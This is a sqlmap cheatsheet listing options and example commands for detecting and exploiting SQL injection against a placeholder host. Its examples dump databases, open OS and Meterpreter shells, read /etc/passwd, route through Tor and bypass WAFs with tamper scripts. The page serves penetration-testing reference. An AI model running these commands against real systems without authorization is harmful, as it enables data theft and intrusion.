sqlmap Cheatsheet

← Back to cheatsheets

← Home

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

sqlmap is an automated SQL injection testing and exploitation tool. It can detect and exploit SQL injection vulnerabilities in web applications, supporting multiple database management systems.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Basic Usage

• sqlmap -u <url> - Test URL for SQL injection
• sqlmap -u "http://target.com/page.php?id=1" - Test specific URL
• sqlmap -u <url> --dbs - Enumerate databases
• sqlmap -u <url> -D <database> --tables - Enumerate tables
• sqlmap -u <url> -D <database> -T <table> --columns - Enumerate columns
• sqlmap -u <url> -D <database> -T <table> --dump - Dump table data

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Target Options

• -u <url> - Target URL
• -l <file> - Target list from Burp log file
• -x <url> - Sitemap URL (XML)
• -m <file> - Multiple targets from file
• -r <file> - HTTP request from file
• -g <query> - Google dork query
• -c <file> - Configuration file

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Request Options

• --data=<data> - POST data string
• --cookie=<cookie> - Cookie string
• --headers=<headers> - HTTP headers
• --user-agent=<ua> - User-Agent string
• --referer=<referer> - Referer string
• --proxy=<proxy> - Use HTTP proxy
• --tor --tor-type=SOCKS5 --check-tor - Use Tor proxy
• -H - Set custom HTTP header
• --method=<method> - HTTP method (GET, POST, PUT, etc.)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Parameter Options

• -p <parameter> - Test specific parameter
• --skip=<param> - Skip testing parameter
• -r <file> - Load HTTP request from file (auto-detect parameters)
• --param-del=<delimiter> - Parameter delimiter

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Enumeration Options

• --dbs - Enumerate databases
• --tables - Enumerate tables
• --columns - Enumerate columns
• --dump - Dump table entries
• --dump-all - Dump all databases
• -D <database> - Specify database
• -T <table> - Specify table
• -C <column> - Specify column
• --schema - Enumerate database schema
• --count - Count entries in table

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Database System Options

• --dbms=<dbms> - Force database type (MySQL, PostgreSQL, MSSQL, Oracle, SQLite)
• --dbms-cred=<user:pass> - Database credentials
• --os=<os> - Force OS type
• --tamper=<script> - Use tamper script

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

File Operations

• --file-read=<file> - Read file from database server
• --file-write=<file> - Write local file to database server
• --file-dest=<path> - Remote file path for write operations

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Shell Options

• --sql-shell - Interactive SQL shell
• --os-shell - Interactive OS shell
• --os-cmd=<cmd> - Execute OS command
• --os-pwn - Meterpreter shell
• --os-smbrelay - SMB relay attack

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Detection Options

• --level=<1-5> - Level of tests (1-5, default 1)
• --risk=<1-3> - Risk of tests (1-3, default 1)
• --technique=<technique> - Injection techniques (B, E, U, S, T, Q)
• --time-sec=<sec> - Seconds to wait for response (default 5)
• --union-cols=<range> - Column range for UNION tests

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Technique Options

• B - Boolean-based blind
• E - Error-based
• U - Union query-based
• S - Stacked queries
• T - Time-based blind
• Q - Inline queries

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Output Options

• --batch - Never ask for user input (use defaults)
• --verbose=<0-6> - Verbosity level
• -v <level> - Verbosity level (0-6)
• --output-dir=<dir> - Output directory

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Misc Options

• --threads=<num> - Max concurrent HTTP requests (default 1)
• --delay=<sec> - Delay between requests (seconds)
• --timeout=<sec> - Request timeout (default 30)
• --retries=<num> - Retries on timeout (default 3)
• --ignore-code=<code> - Ignore HTTP error codes
• --ignore-proxy - Ignore default proxy settings

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Common Examples

Basic Detection

sqlmap -u "http://target.com/page.php?id=1"

Enumerate Databases

sqlmap -u "http://target.com/page.php?id=1" --dbs

Enumerate Tables

sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

Dump Table

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

POST Request

sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" -p username

From Burp Log

sqlmap -l burp_log.txt --batch

Cookie Injection

sqlmap -u "http://target.com/page.php" --cookie="session=abc123" --dbs

Get OS Shell

sqlmap -u "http://target.com/page.php?id=1" --os-shell

Read File

sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"

Use Tor

sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5 --check-tor

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Tips

• Use --batch for automated testing (no user interaction)
• Use -r with Burp log files for easy testing
• Increase --level and --risk for more thorough testing
• Use --threads for faster enumeration (be careful with server load)
• Combine with Burp Suite for complex authentication scenarios
• Use --tamper scripts to bypass WAFs and filters
• Always test on authorized systems only
• Use --proxy to monitor requests with Burp or similar tools
• Check --check-tor before using Tor to verify connection
• Use --batch to avoid prompts in automated scripts

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

← Back to cheatsheets

← Home